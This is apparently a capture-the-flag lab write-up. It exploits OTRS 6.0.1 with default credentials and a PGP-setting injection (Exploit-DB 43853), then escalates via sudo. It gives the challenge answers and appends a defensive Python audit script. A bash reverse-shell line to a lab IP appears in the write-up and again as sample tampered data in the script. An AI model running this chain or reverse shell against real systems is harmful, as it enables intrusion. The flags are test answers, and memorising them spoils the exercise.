# Web Range-119-120

## Challenge 119

## Challenge 120

![image](https://hackmd.io/_uploads/S1VlcqbYgl.png)
![image](https://hackmd.io/_uploads/BkxMS6ZYgl.png)

* Connecting to the IP shows the Ubuntu default page. A scan turns up robots.txt and an `otrs` entry.
* ![image](https://hackmd.io/_uploads/BJoKqcbKlx.png)
* It redirects to a CMS page, `otrs 6.0.1`
* ![image](https://hackmd.io/_uploads/BksCccbYxl.png)
* ![image](https://hackmd.io/_uploads/rJKfi5WYxl.png)
* There is an RCE
* ![image](https://hackmd.io/_uploads/BkxHo9bYlx.png)
* It looks like credentials have to be found first
* ![image](https://hackmd.io/_uploads/r1rqsc-Fxe.png)
* Guessed the credentials; they are basically the defaults
* ![image](https://hackmd.io/_uploads/B1erZsWYgx.png)
* `root@localhost:password`
* After running the script, no connection came back. A closer look at the PoC steps showed that the path is slightly different, so the setting has to be opened and changed by hand
* https://www.exploit-db.com/exploits/43853
* ![image](https://hackmd.io/_uploads/BkVXOhWFeg.png)
* Change the PGP path to python, to be used for the reverse shell
* ![image](https://hackmd.io/_uploads/rkuEt3-tgg.png)
* The command goes in Option
* ![image](https://hackmd.io/_uploads/BkKH93bKlx.png)
* python kept failing to find the correct path, so switch to bash
* ![image](https://hackmd.io/_uploads/BklwxT-Ylg.png)

```zsh
-c 'exec bash -i >& /dev/tcp/172.23.232.2/4444 0>&1'
```

* After the change, visit `?Action=AdminPGP`. Got shell as `www-data`
* ![image](https://hackmd.io/_uploads/SkNJNaWtex.png)
* ![image](https://hackmd.io/_uploads/HkBT7aWFlx.png)
* `sudo -i` escalates directly = =
* ![image](https://hackmd.io/_uploads/r1yjVp-Yxl.png)

## Answer

* Challenge 119: `password`
* Challenge 120: `fb53552b`
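The chain above relies on the PGP binary setting being repointed at an interpreter, a command being placed in the PGP options, and `www-data` being able to run `sudo -i`. The audit below is an added example, not part of the original write-up; the SysConfig key names `PGP::Bin` and `PGP::Options`, the baseline values and the sample sudoers text are assumptions constructed for illustration.

```python
import os
import re

# Programs the PGP binary setting may point to (assumption for this example).
ALLOWED_PGP_BINARIES = {"gpg", "gpg2"}
# Fragments that do not belong on a gpg command line: shell metacharacters,
# bash network pseudo-devices, and an interpreter-style "-c" switch.
SUSPICIOUS_OPTION = re.compile(r"/dev/(tcp|udp)/|[;&|`$<>]|(^|\s)-c(\s|$)")


def audit_pgp_settings(settings):
    """Return findings for a dict of SysConfig values (key names assumed)."""
    findings = []
    binary = settings.get("PGP::Bin", "")
    if os.path.basename(binary) not in ALLOWED_PGP_BINARIES:
        findings.append(f"PGP::Bin is not a gpg binary: {binary!r}")
    options = settings.get("PGP::Options", "")
    if SUSPICIOUS_OPTION.search(options):
        findings.append(f"PGP::Options contains shell syntax: {options!r}")
    return findings


def audit_sudoers(text, user="www-data"):
    """Return active sudoers rules that grant anything to the web server user."""
    rule = re.compile(rf"\s*{re.escape(user)}\s+\S+\s*=")
    return [line.strip() for line in text.splitlines()
            if not line.lstrip().startswith("#") and rule.match(line)]


# Constructed sample data, not taken from a real host.
BASELINE = {"PGP::Bin": "/usr/bin/gpg",
            "PGP::Options": "--homedir /opt/otrs/.gnupg --batch --no-tty --yes"}
TAMPERED = {"PGP::Bin": "/bin/bash",
            "PGP::Options": "-c 'exec bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'"}
SAMPLE_SUDOERS = """\
root ALL=(ALL:ALL) ALL
# www-data ALL=(ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for name, cfg in (("baseline", BASELINE), ("tampered", TAMPERED)):
        print(name, audit_pgp_settings(cfg) or "ok")
    print("sudoers", audit_sudoers(SAMPLE_SUDOERS) or "ok")
```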